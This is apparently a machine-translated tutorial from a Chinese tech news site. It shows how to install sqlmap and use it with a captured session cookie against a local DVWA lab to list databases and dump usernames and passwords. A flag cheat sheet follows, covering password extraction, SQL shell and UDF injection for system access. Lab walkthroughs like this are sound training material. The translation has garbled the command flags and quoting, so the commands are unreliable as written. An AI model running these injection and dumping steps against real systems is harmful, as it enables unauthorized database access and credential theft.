Shulou(Shulou.com)06/01 Report--

A preliminary preparation

1 sqlmap needs the support of python2.7 in windows environment, which can be downloaded from the official website of python.

Https://www.python.org/

2 install python2.7. Default is fine. You need to configure the environment variables after the installation is complete. Right-click computer-> Advanced system Settings-> Environment variable, find the Path option of the system variable, double-click, and add at the end; C:\ Python27 ";" must have, if there is another python, you can delete it. This is my installation path.

3Press windows+R, enter cmd to open the dos interface, and enter python to test whether the python is installed successfully.

Return the python version number. The installation is successful.

Download sqlmap, you can go to my Baidu Cloud to download: http://pan.baidu.com/s/1skPClzR password: ndpj.

After decompression, rename it to sqlmap and put it on disk.

5 Open cmd and switch to the corresponding disk of sqlmap

6 at this point, sqlmap has been installed

Two, start to explode the library.

1 set the dvwa security level to low, using cookie injection. Click sql injection and use burpsuite to grab cookie

2. Both url and cookie need to be used. Open the cmd you just opened and type

Sqlmap.py-u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit"-- cookie" security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1 "--risk 3-- level 5. Enter directly if the option appears midway.

3 obviously see the mysql database, first show the database sqlmap.py-u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit"-- cookie" security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1 "--dbs

4 you can see that there are several databases, and then select the dvwa database, list name

Sqlmap.py-u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit"-cookie" security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1 "- D dvwa-- tables

5 there are two table names, what must be useful is the users table name, and then expose the name

Sqlmap.py-u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit"-cookie" security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1 "- D dvwa-T users-- columns

6 see a lot of column names, the most useful of course are users and passwords, export users and passwords

Sqlmap.py-u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit"-cookie" security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1 "- D dvwa-T users-C user,password,user_id-- dump

7 all right, this is the end, and then there is the complete collection of sqlmap's command interpretation.

-u # injection point

-G Google search

-f # fingerprint to distinguish database type

-b # get database version information

-p # specify testable parameters (? page=1&id=2-p "page,id")

-D "# specify the database name

-T "" # specify the table name

-C "" # specified field

-s "" # saves the injection process to a file and can be interrupted, and the next recovery is in the injection (save:-s "xx.log" restore:-s "xx.log"-resume)

-columns # list fields

-current-user # get the current user name

-current-db # get the current database name

-users # column database all users

-passwords # all passwords of database users

-privileges # View user permissions (- privileges-U root)

-U # specify database user

-dbs # list all databases

-tables-D "" # lists the tables in the specified database

-columns-T "user"-D "mysql" # lists all the fields of the user table in the mysql database

-dump-all # lists all databases and all tables

-exclude-sysdbs # lists only the databases and tables created by the user

-dump-T "- D"-C "" # lists the data of the fields of the table in the specified database (- dump-T users-D master-C surname)

-dump-T "- D"-start 2-top 4 # lists the data of the 2-4 fields of the table in the specified database

-dbms # specify database (MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,SQLite,Firebird,Sybase,SAP MaxDB)

-os # specify system (Linux,Windows)

-- sql-shell writes shell

-- time of delay delay

-- number of safe-freq

-v # level of detail (0-6)

0: only Python backtracking, errors and key messages are displayed.

1: displays messages and warning messages.

2: debug messages are displayed.

3: payload injection.

4: displays the HTTP request.

5: displays the HTTP response header.

6: display the contents of the HTTP response page

-privileges # View permissions

-whether is-dba # is a database administrator

-roles # enumerate database user roles

-udf-inject # Import user-defined functions (get system permissions)

-whether union-check # supports union injection

-union-cols # union query table record

-union-test # union statement test

-union-use # using union injection

-union-tech orderby # union with orderby

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.